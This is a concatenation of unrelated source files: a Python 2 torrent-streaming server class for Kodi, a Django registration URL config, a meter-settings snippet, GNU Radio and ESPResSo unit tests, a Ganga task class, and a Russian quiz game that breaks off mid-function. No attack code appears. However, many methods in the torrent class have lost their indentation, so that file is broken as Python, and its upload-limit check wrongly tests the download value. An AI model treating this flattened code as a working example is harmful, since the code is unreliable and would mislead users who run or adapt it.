        self._dispatcher.add_listener(self._update_ready_pieces)
        # Start downloading from the given URL
        if url:
            self.start_url(url)
def set_speed_limits(self, download=0, upload=0):
"""
Función encargada de poner límites a la velocidad de descarga o subida
"""
if isinstance(download, int) and download > 0:
self._th.set_download_limit(download * 1024)
if isinstance(upload, int) and download > 0:
self._th.set_upload_limit(upload * 1024)
def get_play_list(self):
"""
Función encargada de generar el playlist
"""
# Esperamos a lo metadatos
while not self.has_meta:
time.sleep(1)
# Comprobamos que haya archivos de video
if self.files:
if len(self.files) > 1:
return "http://" + self.ip + ":" + str(self.port) + "/playlist.pls"
else:
return "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(self.files[0].path)
def get_files(self):
"""
Función encargada de genera el listado de archivos
"""
# Esperamos a lo metadatos
while not self.has_meta:
time.sleep(1)
files = []
# Comprobamos que haya archivos de video
if self.files:
# Creamos el dict con los archivos
for file in self.files:
n = file.path
u = "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(n)
s = file.size
files.append({"name": n, "url": u, "size": s})
return files
    def _find_files(self, files, search=None):
        """
        Find the playable (video) files of the torrent and record the total
        size; raises when the torrent contains no video files.
        """
        self.total_size = 0
        # Keep files whose extension appears in VIDEO_EXTS
        # (dict.has_key and list-returning filter: Python 2 semantics).
        videos = filter(lambda f: self.VIDEO_EXTS.has_key(os.path.splitext(f.path)[1]), files)
        if not videos:
            raise Exception('No video files in torrent')
        for v in videos:
            self.total_size += v.size ### ALFA
            # Remember each video's index within the full torrent file list.
            videos[videos.index(v)].index = files.index(v)
        return videos
def set_file(self, f):
"""
Función encargada de seleccionar el archivo que vamos a servir y por tanto, priorizar su descarga
"""
# Seleccionamos el archivo que vamos a servir
fmap = self.meta.map_file(f.index, 0, 1)
self.file = File(f.path, self.temp_path, f.index, f.size, fmap, self.meta.piece_length(), self)
if self.seleccion < 0: ### ALFA
self.file.first_piece = 0 ### ALFA
self.file.last_piece = self.meta.num_pieces() ### ALFA
self.file.size = self.total_size ### ALFA
self.prioritize_file()
    def prioritize_piece(self, pc, idx):
        """
        Prioritize the download of piece `pc`, where `idx` is its position in
        the buffer currently being filled.
        """
        # NOTE(review): `dl` is only consumed by the deadline call disabled
        # in the string-literal block below.
        piece_duration = 1000
        min_deadline = 2000
        dl = idx * piece_duration + min_deadline
        """ ### ALFA
        try:
            self._th.set_piece_deadline(pc, dl, lt.deadline_flags.alert_when_available)
        except:
            pass
        """
        if idx == 0:
            tail_pieces = 9
            # Pieces before the first one are deactivated
            if (self.file.last_piece - pc) > tail_pieces:
                for i in xrange(self.file.first_piece, pc):
                    self._th.piece_priority(i, 0)
                    self._th.reset_piece_deadline(i)
            # Pieces after the first one are activated
            for i in xrange(pc + 1, self.file.last_piece + 1):
                #self._th.piece_priority(i, 0)
                self._th.piece_priority(i, 1)
    def prioritize_file(self):
        """
        Prioritize the pieces belonging to the file selected by set_file().
        """
        priorities = []
        for i in xrange(self.meta.num_pieces()):
            if i >= self.file.first_piece and i <= self.file.last_piece:
                priorities.append(1)
            else:
                # Negative index means "play all": keep every piece active.
                if self.index < 0:
                    priorities.append(1) ### ALFA
                else:
                    priorities.append(0) ### ALFA
        self._th.prioritize_pieces(priorities)
        # Count the pieces that ended up with a non-zero priority (for the log).
        x = 0
        for i, _set in enumerate(self._th.piece_priorities()):
            if _set > 0: x += 1
            #logger.info("***** Nº Pieza: %s: %s" % (i, str(_set)))
        logger.info("***** Piezas %s : Activas: %s" % (str(i+1), str(x)))
        logger.info("***** first_piece %s : last_piece: %s" % (str(self.file.first_piece), str(self.file.last_piece)))
def download_torrent(self, url):
"""
Función encargada de descargar un archivo .torrent
"""
from core import httptools
data = httptools.downloadpage(url).data
return data
    def start_url(self, uri):
        """
        Start downloading the torrent identified by `uri`, which may be:
        - a URL pointing to a .torrent file
        - a magnet URL
        - a local .torrent file path
        Raises when a torrent is already running or the uri is invalid.
        """
        if self._th:
            raise Exception('Torrent is already started')
        # Build the add_torrent parameter dict, reusing cached resume data
        # (fast-resume) whenever it is available for this info-hash.
        if uri.startswith('http://') or uri.startswith('https://'):
            torrent_data = self.download_torrent(uri)
            info = lt.torrent_info(lt.bdecode(torrent_data))
            tp = {'ti': info}
            resume_data = self._cache.get_resume(info_hash=str(info.info_hash()))
            if resume_data:
                tp['resume_data'] = resume_data
        elif uri.startswith('magnet:'):
            tp = {'url': uri}
            resume_data = self._cache.get_resume(info_hash=Cache.hash_from_magnet(uri))
            if resume_data:
                tp['resume_data'] = resume_data
        elif os.path.isfile(uri):
            if os.access(uri, os.R_OK):
                info = lt.torrent_info(uri)
                tp = {'ti': info}
                resume_data = self._cache.get_resume(info_hash=str(info.info_hash()))
                if resume_data:
                    tp['resume_data'] = resume_data
            else:
                raise ValueError('Invalid torrent path %s' % uri)
        else:
            raise ValueError("Invalid torrent %s" % uri)
        tp.update(self.torrent_paramss)
        self._th = self._ses.add_torrent(tp)
        for tr in self.INITIAL_TRACKERS:
            self._th.add_tracker({'url': tr})
        self._th.set_sequential_download(True)
        self._th.force_reannounce()
        self._th.force_dht_announce()
        # Start the background threads, then serve HTTP (blocks here).
        self._monitor.start()
        self._dispatcher.do_start(self._th, self._ses)
        self.server.run()
    def stop(self):
        """
        Stop the torrent, persist its state and shut everything down.
        """
        self._dispatcher.stop()
        self._dispatcher.join()
        self._monitor.stop()
        self.server.stop()
        # NOTE(review): the dispatcher is stopped a second time here —
        # redundant but harmless; confirm before removing.
        self._dispatcher.stop()
        if self._ses:
            self._ses.pause()
            if self._th:
                self.save_resume()
            self.save_state()
            self._stop_services()
            self._ses.remove_torrent(self._th, self.auto_delete)
        del self._ses
        self.closed = True
    def pause(self):
        """
        Pause the libtorrent session.
        """
        self._ses.pause()
def _start_services(self):
"""
Función encargada de iniciar los servicios de libtorrent: dht, lsd, upnp, natpnp
"""
self._ses.add_dht_router("router.bittorrent.com", 6881)
self._ses.add_dht_router("router.bitcomet.com", 554)
self._ses.add_dht_router("router.utorrent.com", 6881)
self._ses.add_dht_router("dht.transmissionbt.com",6881) ### from MCT
self._ses.start_dht()
self._ses.start_lsd()
self._ses.start_upnp()
self._ses.start_natpmp()
    def _stop_services(self):
        """
        Stop the libtorrent services in reverse start order: natpmp, upnp, lsd, dht.
        """
        self._ses.stop_natpmp()
        self._ses.stop_upnp()
        self._ses.stop_lsd()
        self._ses.stop_dht()
    def save_resume(self):
        """
        Save the torrent's fast-resume metadata so a future download of the
        same torrent can restart quickly.
        """
        if self._th.need_save_resume_data() and self._th.is_valid() and self.meta:
            r = ResumeData(self)
            start = time.time()
            # Wait up to 5 seconds for libtorrent to deliver the resume data.
            while (time.time() - start) <= 5:
                if r.data or r.failed:
                    break
                time.sleep(0.1)
            if r.data:
                self._cache.save_resume(self.unique_file_id, lt.bencode(r.data))
    @property
    def status(self):
        """
        Return the libtorrent status object extended with extra fields
        (progress, buffer, timeout, peer origins...). Returns None while no
        torrent handle exists.
        """
        if self._th:
            s = self._th.status()
            # Download Rate
            s._download_rate = s.download_rate / 1024
            # File progress
            if self.file:
                pieces = s.pieces[self.file.first_piece:self.file.last_piece] ### ALFA
                progress = float(sum(pieces)) / len(pieces)
                s.pieces_len = len(pieces) ### ALFA
                s.pieces_sum = sum(pieces) ### ALFA
                #logger.info('***** Estado piezas: %s' % pieces)
            else:
                progress = 0
                s.pieces_len = 0 ### ALFA
                s.pieces_sum = 0 ### ALFA
            s.progress_file = progress * 100
            # File size (in MiB)
            s.file_name = '' ### ALFA
            s.seleccion = '' ### ALFA
            if self.file:
                s.seleccion = self.seleccion ### ALFA
                s.file_name = self.file.path ### ALFA
                s.file_size = self.file.size / 1048576.0
            else:
                s.file_size = 0
            # Buffer state
            if self.file and self.file.cursor:  # Active connection: available vs player position
                percent = len(self.file.cursor.cache)
                percent = percent * 100 / self.buffer_size
                s.buffer = int(percent)
            elif self.file:  # No active connection: pre-buffer before starting
                # The pre-buffer has two parts:
                # 1. Buffer at the start of the file so the player starts without stalls
                # 2. Buffer at the end of the file (some players inspect the file tail before starting)
                bp = []
                # Start-buffer size is the buffer size minus the tail-buffer size
                first_pieces_priorize = self.buffer_size - self.last_pieces_priorize
                # Check which parts of the start buffer are available
                for x in range(first_pieces_priorize):
                    if self._th.have_piece(self.file.first_piece + x):
                        bp.append(True)
                    else:
                        bp.append(False)
                # Check which parts of the tail buffer are available
                for x in range(self.last_pieces_priorize):
                    if self._th.have_piece(self.file.last_piece - x):
                        bp.append(True)
                    else:
                        bp.append(False)
                s.buffer = int(sum(bp) * 100 / self.buffer_size)
            else:  # No file selected: no buffer
                s.buffer = 0
            # Time left before auto-close when the timeout is active
            if self.auto_shutdown:
                if self.connected:
                    if self.timeout:
                        s.timeout = int(self.timeout - (time.time() - self.last_connect - 1))
                        if self.file and self.file.cursor:
                            s.timeout = self.timeout
                        if s.timeout < 0: s.timeout = "Cerrando"
                    else:
                        s.timeout = "---"
                else:
                    if self.start_time and self.wait_time:
                        s.timeout = int(self.wait_time - (time.time() - self.start_time - 1))
                        if s.timeout < 0: s.timeout = "Cerrando"
                    else:
                        s.timeout = "---"
            else:
                s.timeout = "Off"
            # Download state (user-facing Spanish labels)
            STATE_STR = ['En cola', 'Comprobando', 'Descargando metadata', \
                         'Descargando', 'Finalizado', 'Seeding', 'Allocating', 'Comprobando fastresume']
            s.str_state = STATE_STR[s.state]
            # DHT state
            if self._ses.dht_state() is not None:
                s.dht_state = "On"
                s.dht_nodes = self._ses.status().dht_nodes
            else:
                s.dht_state = "Off"
                s.dht_nodes = 0
            # Tracker count
            s.trackers = len(self._th.trackers())
            # Peer origins (bit flags of peer.source)
            s.dht_peers = 0
            s.trk_peers = 0
            s.pex_peers = 0
            s.lsd_peers = 0
            for peer in self._th.get_peer_info():
                if peer.source & 1:
                    s.trk_peers += 1
                if peer.source & 2:
                    s.dht_peers += 1
                if peer.source & 4:
                    s.pex_peers += 1
                if peer.source & 8:
                    s.lsd_peers += 1
            return s
"""
Servicios:
- Estas funciones se ejecutan de forma automatica cada x tiempo en otro Thread.
- Estas funciones son ejecutadas mientras el torrent esta activo algunas pueden desactivarse
segun la configuracion como por ejemplo la escritura en el log
"""
def _auto_shutdown(self, *args, **kwargs):
"""
Servicio encargado de autoapagar el servidor
"""
if self.file and self.file.cursor:
self.last_connect = time.time()
self.connected = True
if self.is_playing_fnc and self.is_playing_fnc():
self.last_connect = time.time()
self.connected = True
if self.auto_shutdown:
# shudown por haber cerrado el reproductor
if self.connected and self.is_playing_fnc and not self.is_playing_fnc():
if time.time() - self.last_connect - 1 > self.timeout:
self.stop()
# shutdown por no realizar ninguna conexion
if (not self.file or not self.file.cursor) and self.start_time and self.wait_time and not self.connected:
if time.time() - self.start_time - 1 > self.wait_time:
self.stop()
# shutdown tras la ultima conexion
if (not self.file or not self.file.cursor) and self.timeout and self.connected and not self.is_playing_fnc:
if time.time() - self.last_connect - 1 > self.timeout:
self.stop()
    def announce_torrent(self):
        """
        Service in charge of re-announcing the torrent to trackers and DHT.
        """
        self._th.force_reannounce()
        self._th.force_dht_announce()
def save_state(self):
"""
Servicio encargado de guardar el estado
"""
state = self._ses.save_state()
f = open(os.path.join(self.temp_path, self.state_file), 'wb')
pickle.dump(state, f)
f.close()
def _update_ready_pieces(self, alert_type, alert):
"""
Servicio encargado de informar que hay una pieza disponible
"""
if alert_type == 'read_piece_alert' and self.file:
self.file.update_piece(alert.piece, alert.buffer)
    def _check_meta(self):
        """
        Service in charge of detecting when the torrent metadata has been
        downloaded; it then selects which video file(s) to serve.
        """
        # States 3..5 (downloading/finished/seeding) imply the metadata exists.
        if self.status.state >= 3 and self.status.state <= 5 and not self.has_meta:
            # Save the metadata
            self.meta = self._th.get_torrent_info()
            # Get the file list from the metadata
            fs = self.meta.files()
            if isinstance(fs, list):
                files = fs
            else:
                files = [fs.at(i) for i in xrange(fs.num_files())]
            # Keep only the video files
            self.files = self._find_files(files)
            # If there are several videos (and no RAR), let the user pick one or "all"
            lista = []
            seleccion = 0
            for file in self.files:
                if '.rar' in str(file.path):
                    seleccion = -9
                lista += [os.path.split(str(file.path))[1]]
            if len(lista) > 1 and seleccion >= 0:
                d = xbmcgui.Dialog()
                seleccion = d.select(msg_header + ": Selecciona el vídeo, o 'Cancelar' para todos", lista)
            # Negative selection ("cancel"/RAR) means serve everything.
            if seleccion < 0:
                index = 0
                self.index = seleccion
            else:
                index = seleccion
                self.index = self.files[index].index
            self.seleccion = seleccion
            # Mark the chosen file as active
            self.set_file(self.files[index])
            # The download is now considered started
            self.start_time = time.time()
            # Cache the .torrent file
            self._cache.file_complete(self._th.get_torrent_info())
            self.has_meta = True
    def priorize_start_file(self):
        '''
        Service in charge of prioritizing the beginning and end of the file
        while there is no active connection.
        '''
        if self.file and not self.file.cursor:
            num_start_pieces = self.buffer_size - self.last_pieces_priorize  # pieces to prioritize at the start
            num_end_pieces = self.last_pieces_priorize  # pieces to prioritize at the end
            pieces_count = 0
            # Prioritize the last pieces first (players probe the file tail)
            for y in range(self.file.last_piece - num_end_pieces, self.file.last_piece + 1):
                if not self._th.have_piece(y):
                    self.prioritize_piece(y, pieces_count)
                    pieces_count += 1
            # Then the first pieces, until the buffer budget is exhausted
            for y in range(self.file.first_piece, self.file.last_piece + 1):
                if not self._th.have_piece(y):
                    if pieces_count == self.buffer_size:
                        break
                    self.prioritize_piece(y, pieces_count)
                    pieces_count += 1
    def print_status(self):
        '''
        Service in charge of logging the current download status.
        '''
        s = self.status ### ALFA
        # Show the 1-based file number, or the raw negative "all files" marker.
        if self.seleccion >= 0:
            archivo = self.seleccion + 1
        else:
            archivo = self.seleccion
        logger.info(
            '%.2f%% de %.1fMB %s | %.1f kB/s | #%s %d%% | AutoClose: %s | S: %d(%d) P: %d(%d)) | TRK: %d DHT: %d PEX: %d LSD %d | DHT:%s (%d) | Trakers: %d | Pieces: %d (%d)' % \
            (s.progress_file, s.file_size, s.str_state, s._download_rate, archivo, s.buffer, s.timeout, s.num_seeds, \
             s.num_complete, s.num_peers, s.num_incomplete, s.trk_peers, s.dht_peers, s.pex_peers, s.lsd_peers,
             s.dht_state, s.dht_nodes, s.trackers, s.pieces_sum, s.pieces_len)) ### ALFA
|
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from registration.views import register
# URL configuration for django-registration's one-step (simple) backend,
# wired to .hamlpy templates. Uses the pre-Django-1.8 patterns() API.
urlpatterns = patterns('',
                       # urls for simple one-step registration
                       url(r'^register/$',
                           register,
                           {'backend': 'registration.backends.simple.SimpleBackend',
                            'template_name': 'registration/registration_form.hamlpy',
                            },
                           name='registration_register'
                           ),
                       url(r'^register/closed/$',
                           direct_to_template,
                           {'template': 'registration/registration_closed.hamlpy'},
                           name='registration_disallowed'
                           ),
                       url(r'^login/$',
                           auth_views.login,
                           {'template_name': 'registration/login.hamlpy'},
                           name='auth_login'
                           ),
                       url(r'^logout/$',
                           auth_views.logout,
                           {'template_name': 'registration/logout.hamlpy'},
                           name='auth_logout'
                           ),
                       url(r'^password/change/$',
                           auth_views.password_change,
                           {'template_name': 'registration/password_change_form.hamlpy',
                            # ugh, this is tied to the namespace; needs to be namespace-agnostic
                            # since the namspace is determined by the importing app
                            # TODO: see Issue #1
                            'post_change_redirect': reverse_lazy('registration:auth_password_change_done')
                            },
                           name='auth_password_change'
                           ),
                       url(r'^password/change/done/$',
                           auth_views.password_change_done,
                           {'template_name': 'registration/password_change_done.hamlpy'},
                           name='auth_password_change_done'
                           ),
                       url(r'^password/reset/$',
                           auth_views.password_reset,
                           {'template_name': 'registration/password_reset_form.hamlpy',
                            # same issue as above
                            'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'),
                            'email_template_name': 'registration/password_reset_email.hamlpy',
                            'subject_template_name': 'registration/password_reset_subject.hamlpy',
                            },
                           name='auth_password_reset'
                           ),
                       url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
                           auth_views.password_reset_confirm,
                           {'template_name': 'registration/password_reset_confirm.hamlpy',
                            # same issue as above
                            'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'),
                            },
                           name='auth_password_reset_confirm'
                           ),
                       url(r'^password/reset/complete/$',
                           auth_views.password_reset_complete,
                           {'template_name': 'registration/password_reset_complete.hamlpy'},
                           name='auth_password_reset_complete'
                           ),
                       url(r'^password/reset/done/$',
                           auth_views.password_reset_done,
                           {'template_name': 'registration/password_reset_done.hamlpy'},
                           name='auth_password_reset_done'
                           ),
                       )
|
name = "*PEAK only"
Cs={}
maxS=2
maxW=2
splitheavies=0
Cs['strength.w=>-p']=1
Cs['footmin-w-resolution']=1
Cs['footmin-f-resolution']=1
Cs['skip_initial_foot']=1
|
from gnuradio import gr, gr_unittest
from gnuradio import blocks
import grdab
class qa_measure_processing_rate(gr_unittest.TestCase):
    """
    @brief QA for measure processing rate sink.
    This class implements a test bench to verify the corresponding C++ class.
    """
    def setUp(self):
        """Create a fresh flow graph for each test."""
        self.tb = gr.top_block()
    def tearDown(self):
        """Release the flow graph."""
        self.tb = None
    def test_001_measure_processing_rate(self):
        """A complex stream throttled to 1 Msps should measure ~1 Msps (±10%)."""
        src = blocks.null_source(gr.sizeof_gr_complex)
        throttle = blocks.throttle(gr.sizeof_gr_complex, 1000000)
        head = blocks.head(gr.sizeof_gr_complex, 200000)
        sink = grdab.measure_processing_rate(gr.sizeof_gr_complex,100000)
        self.tb.connect(src, throttle, head, sink)
        self.tb.run()
        rate = sink.processing_rate()
        # Use unittest assertions instead of bare `assert`: they survive
        # `python -O` and report the measured value on failure.
        self.assertGreater(rate, 900000)
        self.assertLess(rate, 1100000)
    def test_002_measure_processing_rate(self):
        """A byte stream throttled to 10 Msps should measure ~10 Msps (±20%)."""
        src = blocks.null_source(gr.sizeof_char)
        throttle = blocks.throttle(gr.sizeof_char, 10000000)
        head = blocks.head(gr.sizeof_char, 1000000)
        sink = grdab.measure_processing_rate(gr.sizeof_char,1000000)
        self.tb.connect(src, throttle, head, sink)
        self.tb.run()
        rate = sink.processing_rate()
        self.assertGreater(rate, 8000000)
        self.assertLess(rate, 12000000)
# Run the QA suite through GNU Radio's unittest wrapper when executed directly.
if __name__ == '__main__':
    gr_unittest.main()
|
import numpy as np
import unittest as ut
import espressomd
import espressomd.electrostatics
import espressomd.interactions
from espressomd import drude_helpers
class Drude(ut.TestCase):
    """Validate Drude-oscillator dipoles/polarizabilities against LAMMPS reference data."""

    @ut.skipIf(not espressomd.has_features("P3M", "THOLE", "LANGEVIN_PER_PARTICLE"), "Test needs P3M, THOLE and LANGEVIN_PER_PARTICLE")
    def test(self):
        """
        Sets up a BMIM PF6 pair separated in y-direction with fixed cores.
        Adds the Drude particles and related features (intramolecular exclusion bonds, Thole screening)
        via helper functions.
        Calculates the induced dipole moment and the diagonals of the polarization tensor
        and compares against reference results, which where reproduced with LAMMPS.
        """
        box_l = 50
        system = espressomd.System(box_l=[box_l, box_l, box_l])
        # Deterministic RNG seeds (one per MPI node) so results are reproducible.
        system.seed = system.cell_system.get_state()['n_nodes'] * [12]
        np.random.seed(12)
        #Reference Results, reproduced with LAMMPS
        #Dipole Moments
        ref_mu0_pf6 = [0.00177594, 0.16480996, -0.01605161]
        ref_mu0_c1 = [0.00076652, 0.15238767, 0.00135291]
        ref_mu0_c2 = [-0.00020222, 0.11084197, 0.00135842]
        ref_mu0_c3 = [0.00059177, 0.23949626, -0.05238468]
        ref_mu0_bmim = [0.00115606, 0.5027259, -0.04967335]
        #Polarisation Tensor diagonals
        ref_pol_pf6 = [
            4.5535698335873445, 4.7558611769477697, 4.5546580162000554]
        ref_pol_bmim = [
            13.126868394164262, 14.392582501485913, 16.824150151623762]
        #TIMESTEP
        fs_to_md_time = 1.0e-2
        time_step_fs = 0.5
        time_step_ns = time_step_fs * 1e-6
        dt = time_step_fs * fs_to_md_time
        #COM TEMPERATURE
        #Global thermostat temperature, for com and langevin.
        #LangevinPerParticle temperature is set to 0 for drude and core to properly account for com forces.
        # Like that, langevin thermostat can still be used for non-drude
        # particles
        SI_temperature = 300.0
        gamma_com = 1.0
        kb_kjmol = 0.0083145
        temperature_com = SI_temperature * kb_kjmol
        # COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon_0) in
        # Angstrom * kJ/mol
        coulomb_prefactor = 1.67101e5 * kb_kjmol
        #POLARIZATION
        #polarization = 1.0 #In (Angstrom^3)_CGS
        # alpha_SI = 4*Pi*eps_0 alpha_CGS;
        # 4*Pi*epsilon_0*Angstrom^3/((elementary charge)^2*Angstrom^2*N_A/kJ)
        conv_pol_CGS_SI = 7.197586e-4
        #alpha = conv_pol_CGS_SI*args.polarization
        #DRUDE/TOTAL MASS
        #lamoureux03 used values 0.1-0.8 g/mol for drude mass
        mass_drude = 0.8
        mass_tot = 100.0
        mass_core = mass_tot - mass_drude
        mass_red_drude = mass_drude * mass_core / mass_tot
        #SPRING CONSTANT DRUDE
        #Used 1000kcal/mol/A^2 from lamoureux03a table 1 p 3031
        k_drude = 4184.0
        # in kJ/mol/A^2
        T_spring = 2.0 * np.pi * np.sqrt(mass_drude / k_drude)
        #T_spring_fs = T_spring/fs_to_md_time
        #Period of free oscillation: T_spring = 2Pi/w; w = sqrt(k_d/m_d)
        #TEMP DRUDE
        # Used T* = 1K from lamoureux03a p 3031 (2) 'Cold drude oscillators
        # regime'
        SI_temperature_drude = 1.0
        temperature_drude = SI_temperature_drude * kb_kjmol
        #GAMMA DRUDE
        #Thermostat relaxation time should be similar to T_spring
        gamma_drude = mass_red_drude / T_spring
        system.cell_system.skin = 0.4
        system.time_step = dt
        #Forcefield
        # Particle type ids; "_D" types are the Drude particles attached to each core.
        types = {"PF6": 0, "BMIM_C1": 1, "BMIM_C2": 2, "BMIM_C3":
                 3, "BMIM_COM": 4, "PF6_D": 5, "BMIM_C1_D": 6, "BMIM_C2_D": 7, "BMIM_C3_D": 8}
        charges = {"PF6": -0.78, "BMIM_C1": 0.4374,
                   "BMIM_C2": 0.1578, "BMIM_C3": 0.1848, "BMIM_COM": 0}
        polarizations = {"PF6": 4.653, "BMIM_C1":
                         5.693, "BMIM_C2": 2.103, "BMIM_C3": 7.409}
        masses = {"PF6": 144.96, "BMIM_C1": 67.07,
                  "BMIM_C2": 15.04, "BMIM_C3": 57.12, "BMIM_COM": 0}
        # BMIM center-of-mass mass is the sum of its three sites.
        masses["BMIM_COM"] = masses["BMIM_C1"] + \
            masses["BMIM_C2"] + masses["BMIM_C3"]
        box_center = 0.5 * np.array(3 * [box_l])
        system.min_global_cut = 3.5
        #Place Particles
        dmol = 5.0
        #Test Anion
        # Cores are fixed in space; only the Drude particles will move.
        pos_pf6 = box_center + np.array([0, dmol, 0])
        system.part.add(id=0, type=types["PF6"], pos=pos_pf6, q=charges[
                        "PF6"], mass=masses["PF6"], fix=[1, 1, 1])
        pos_com = box_center - np.array([0, dmol, 0])
        system.part.add(id=2, type=types["BMIM_C1"], pos=pos_com + [
                        0, -0.527, 1.365], q=charges["BMIM_C1"], mass=masses["BMIM_C1"], fix=[1, 1, 1])
        system.part.add(id=4, type=types["BMIM_C2"], pos=pos_com + [
                        0, 1.641, 2.987], q=charges["BMIM_C2"], mass=masses["BMIM_C2"], fix=[1, 1, 1])
        system.part.add(id=6, type=types["BMIM_C3"], pos=pos_com + [
                        0, 0.187, -2.389], q=charges["BMIM_C3"], mass=masses["BMIM_C3"], fix=[1, 1, 1])
        system.thermostat.set_langevin(kT=temperature_com, gamma=gamma_com)
        p3m = espressomd.electrostatics.P3M(
            prefactor=coulomb_prefactor, accuracy=1e-4, mesh=[18, 18, 18], cao=5)
        system.actors.add(p3m)
        #Drude related Bonds
        thermalized_dist_bond = espressomd.interactions.ThermalizedBond(
            temp_com=temperature_com, gamma_com=gamma_com, temp_distance=temperature_drude, gamma_distance=gamma_drude, r_cut=1.0)
        harmonic_bond = espressomd.interactions.HarmonicBond(
            k=k_drude, r_0=0.0, r_cut=1.0)
        system.bonded_inter.add(thermalized_dist_bond)
        system.bonded_inter.add(harmonic_bond)
        # Attach one Drude particle (odd ids) to each fixed core (even ids).
        drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
                                                 0], 1, types["PF6_D"], polarizations["PF6"], mass_drude, coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
                                                 2], 3, types["BMIM_C1_D"], polarizations["BMIM_C1"], mass_drude, coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
                                                 4], 5, types["BMIM_C2_D"], polarizations["BMIM_C2"], mass_drude, coulomb_prefactor, 2.0)
        drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[
                                                 6], 7, types["BMIM_C3_D"], polarizations["BMIM_C3"], mass_drude, coulomb_prefactor, 2.0)
        #Setup and add Drude-Core SR exclusion bonds
        drude_helpers.setup_and_add_drude_exclusion_bonds(system)
        #Setup intramol SR exclusion bonds once
        drude_helpers.setup_intramol_exclusion_bonds(
            system, [6, 7, 8], [1, 2, 3], [charges["BMIM_C1"], charges["BMIM_C2"], charges["BMIM_C3"]])
        #Add bonds per molecule
        drude_helpers.add_intramol_exclusion_bonds(
            system, [3, 5, 7], [2, 4, 6])
        #Thole
        drude_helpers.add_all_thole(system)

        def dipole_moment(id_core, id_drude):
            # Induced dipole: Drude charge times core->Drude displacement.
            pc = system.part[id_core]
            pd = system.part[id_drude]
            v = pd.pos - pc.pos
            return pd.q * v

        def measure_dipole_moments():
            # Equilibrate, then average the induced dipoles over 100 steps.
            dm_pf6 = []
            dm_C1 = []
            dm_C2 = []
            dm_C3 = []
            system.integrator.run(115)
            for i in range(100):
                system.integrator.run(1)
                dm_pf6.append(dipole_moment(0, 1))
                dm_C1.append(dipole_moment(2, 3))
                dm_C2.append(dipole_moment(4, 5))
                dm_C3.append(dipole_moment(6, 7))
            dm_pf6_m = np.mean(dm_pf6, axis=0)
            dm_C1_m = np.mean(dm_C1, axis=0)
            dm_C2_m = np.mean(dm_C2, axis=0)
            dm_C3_m = np.mean(dm_C3, axis=0)
            # BMIM molecular dipole is the sum over its three sites.
            dm_sum_bmim = dm_C1_m + dm_C2_m + dm_C3_m
            res = dm_pf6_m, dm_C1_m, dm_C2_m, dm_C3_m, dm_sum_bmim
            return res

        def setElectricField(E):
            # Apply a uniform field as per-particle external forces q*E.
            E = np.array(E)
            for p in system.part:
                p.ext_force = p.q * E

        def calc_pol(mu0, muE, E):
            # Polarizability from the induced-dipole difference, in CGS units.
            pol = (muE - mu0) / E / conv_pol_CGS_SI
            return pol

        def measure_pol(Es, dim):
            # Field of magnitude Es along axis `dim`; return (pf6, bmim) diagonals.
            E = [0.0, 0.0, 0.0]
            E[dim] = Es
            setElectricField(E)
            mux_pf6, mux_c1, mux_c2, mux_c3, mux_bmim = measure_dipole_moments(
            )
            return calc_pol(mu0_pf6[dim], mux_pf6[dim], Es), calc_pol(mu0_bmim[dim], mux_bmim[dim], Es)

        # Zero-field baseline dipoles.
        mu0_pf6, mu0_c1, mu0_c2, mu0_c3, mu0_bmim = measure_dipole_moments()
        eA_to_Debye = 4.8032047
        atol = 1e-2
        rtol = 1e-2
        np.testing.assert_allclose(
            ref_mu0_pf6, eA_to_Debye * mu0_pf6, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c1, eA_to_Debye * mu0_c1, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c2, eA_to_Debye * mu0_c2, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_c3, eA_to_Debye * mu0_c3, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_mu0_bmim, eA_to_Debye * mu0_bmim, atol=atol, rtol=rtol)
        # Polarization tensor diagonals: apply the field along each axis in turn.
        pol_pf6 = []
        pol_bmim = []
        Efield = 96.48536  # = 1 V/A in kJ / (Avogadro Number) / Angstrom / elementary charge
        res = measure_pol(Efield, 0)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])
        res = measure_pol(Efield, 1)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])
        res = measure_pol(Efield, 2)
        pol_pf6.append(res[0])
        pol_bmim.append(res[1])
        np.testing.assert_allclose(
            ref_pol_pf6, pol_pf6, atol=atol, rtol=rtol)
        np.testing.assert_allclose(
            ref_pol_bmim, pol_bmim, atol=atol, rtol=rtol)

if __name__ == "__main__":
    ut.main()
|
from GangaCore.GPIDev.Lib.Tasks import ITask
from GangaCore.GPIDev.Schema import Schema, Version

class CoreTask(ITask):
    """General non-experimentally specific Task"""
    # Copy the parent's schema datadict so CoreTask mirrors ITask's fields.
    _schema = Schema(Version(1, 0), dict(ITask._schema.datadict.items()))
    _category = 'tasks'
    _name = 'CoreTask'
    # No extra exported methods beyond those inherited from ITask.
    _exportmethods = list(ITask._exportmethods)
    _tasktype = "ITask"
    default_registry = "tasks"
|
from enemies import *
from hero import *
def annoying_input_int(message =''):
    """Prompt with *message* until the user types a valid integer; return it.

    Non-numeric input prints an error (in Russian) and re-prompts.
    """
    while True:
        try:
            return int(input(message))
        except ValueError:
            # Not a number -- complain and ask again.
            print('Вы ввели недопустимые символы')
def game_tournament(hero, dragon_list):
    """Run quiz battles between *hero* and each dragon in *dragon_list*.

    A correct answer lets the hero strike the dragon; a wrong answer lets
    the dragon strike back.  The tournament stops early if the hero dies.
    """
    for dragon in dragon_list:
        print('Вышел', dragon._color, 'дракон!')
        while dragon.is_alive() and hero.is_alive():
            print('Вопрос:', dragon.question())
